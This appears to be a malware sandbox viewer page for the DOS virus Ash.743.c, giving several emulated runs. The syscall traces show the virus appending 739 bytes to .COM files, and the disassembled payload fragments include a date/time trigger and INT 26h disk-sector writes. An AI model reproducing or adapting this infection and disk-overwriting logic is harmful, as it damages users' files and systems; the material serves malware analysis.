Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.c


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:30.485308255Z 26 PC: 14146 | Set disk transfer address
2018-12-17T22:46:30.495299159Z 78 PC: 1419c | Find first file
2018-12-17T22:46:30.502916733Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:30.526234529Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.533903419Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.536549511Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.539862335Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.564700219Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.566371444Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.574071522Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.583029665Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.586582805Z 61 PC: 141a8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:30.59371052Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.600633501Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.603204755Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.606934781Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.615824797Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.618680573Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.626114326Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.635532374Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.639206578Z 61 PC: 141a8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:30.64650702Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.653490738Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.655298827Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.659077753Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.66858212Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.67047682Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.678566368Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.687578766Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.695271793Z 61 PC: 141a8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:30.704528026Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.71157682Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.713071716Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.718786143Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.727772329Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.730331411Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.740964208Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.750734659Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.753902233Z 61 PC: 141a8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:30.762407897Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.771650699Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.773473152Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.777760148Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.787167431Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.78918429Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.797001841Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.807765063Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.813697391Z 61 PC: 141a8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:30.819751214Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.827341304Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.82872592Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.831417604Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.838687766Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.841071092Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.848305173Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.861197323Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.86427304Z 61 PC: 141a8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:30.872334425Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.880938454Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.882812253Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.88621834Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.896189553Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.898103294Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.905681484Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.916044879Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.92060923Z 61 PC: 141a8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:30.928382583Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.931730381Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.934823462Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.937893498Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-17T22:46:30.940462181Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-17T22:46:30.944155871Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.300748795Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.302195193Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.307973004Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.314157462Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.320967052Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.322570109Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.325237955Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:22:13.34171151Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:13.343289457Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.350489585Z 62 PC: 14190 | Close file
2018-12-25T12:22:13.35931962Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.361952952Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.368335538Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.375137152Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.376419751Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.379025203Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.386870201Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.388344791Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.394873182Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.40469237Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.407485337Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.414418818Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.420704057Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.422141425Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.424670554Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.432381804Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.433924924Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.440234074Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.448160485Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.451766066Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.458034942Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.464190085Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.466108911Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.468628926Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.476401958Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.47865597Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.485326545Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.491448858Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.494461117Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.498530367Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.50254742Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.504317817Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.506318416Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.512765741Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.514169067Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.518637778Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.5240583Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.526986696Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.533650087Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.540029895Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.542685202Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.545690456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.554972085Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.557323956Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.564697233Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.573304959Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.576117181Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.583334341Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.589747565Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.591350668Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.594542981Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.602555015Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.604097369Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.611250428Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.620417262Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.623432502Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.631613794Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.634545263Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.636715927Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.64068797Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:13.643130246Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:13.645489761Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.503602429Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.505158556Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.509516093Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.513694889Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.517778415Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.519288055Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.521260743Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:22:13.533247371Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:13.540223412Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.54456477Z 62 PC: 14190 | Close file
2018-12-25T12:22:13.551083202Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.555474538Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.561173994Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.569107331Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.571316467Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.574686558Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.584388744Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.586571304Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.59449753Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.60431696Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.6073618Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.615594904Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.622857608Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.624587752Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.627767711Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.636940361Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.638875241Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.648266826Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.963950429Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.967285239Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.976120438Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.982771653Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.986725665Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.990271939Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.000449119Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.002265738Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.009510191Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.019688968Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.022551729Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.029947657Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.038390047Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.040265795Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.043580464Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.053197802Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.055019298Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.062654542Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.07296262Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.076556468Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.085415205Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.093074866Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.095906377Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.099263266Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.109259851Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.111816283Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.119395917Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.129052856Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.132872866Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.140511249Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.148433113Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.151054421Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.154521764Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.163664129Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.166126298Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.170418198Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.423787676Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.427584218Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.436475738Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.440895988Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.44343598Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.448430265Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:14.451220149Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:14.45445313Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.65881671Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.660944013Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.667323434Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.673995694Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.681218058Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.684103983Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.686676786Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:22:13.70146833Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:13.703153618Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.70949978Z 62 PC: 14190 | Close file
2018-12-25T12:22:13.717902803Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.721156461Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.727432894Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.733554323Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.73554101Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.738916551Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.746941691Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.748712904Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.75543496Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.763409365Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.766791005Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.773140537Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.779397367Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.788801808Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.791397456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.799070636Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.800696392Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.807362204Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.815607606Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.819479349Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.826844501Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.833265735Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.835604311Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.838499627Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.846327292Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.848118309Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.855182965Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.863161566Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.865871035Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.872785631Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.879614243Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.881213217Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.884050668Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.892446616Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.893880628Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.900579338Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.910896174Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.913940259Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.921059451Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.927885012Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.929543618Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.933444773Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.098834723Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.100559826Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.107750325Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.156537014Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.158993777Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.166115391Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.172281322Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.173491508Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.176887679Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.193261726Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.194612881Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.201979045Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.228601258Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.231167024Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.23832924Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.242306316Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.244333727Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.247786822Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:14.250113148Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:14.25242328Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.965356111Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.967242305Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.973046265Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.979448179Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.987006665Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.988460227Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.991019423Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
